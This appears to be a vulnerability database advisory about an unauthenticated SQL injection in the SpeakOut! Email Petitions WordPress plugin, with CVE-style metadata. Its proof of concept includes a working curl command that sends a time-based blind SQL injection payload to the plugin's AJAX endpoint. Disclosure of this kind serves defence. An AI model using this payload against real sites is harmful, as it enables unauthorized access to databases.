WordPress Plugin Vulnerabilities
SpeakOut! Email Petitions < 2.14.15.1 - Unauthenticated SQLi
Description
The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users
Proof of Concept
Create a new email petition (/wp-admin/admin.php?page=dk_speakout_addnew), check [x] Do not send email (only collect signatures), enter a title and hit save. Then as unauthenticated, curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=dk_speakout_sendmail&id=11 AND (SELECT 5023 FROM (SELECT(SLEEP(5)))Fvrh)-- VoFu'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)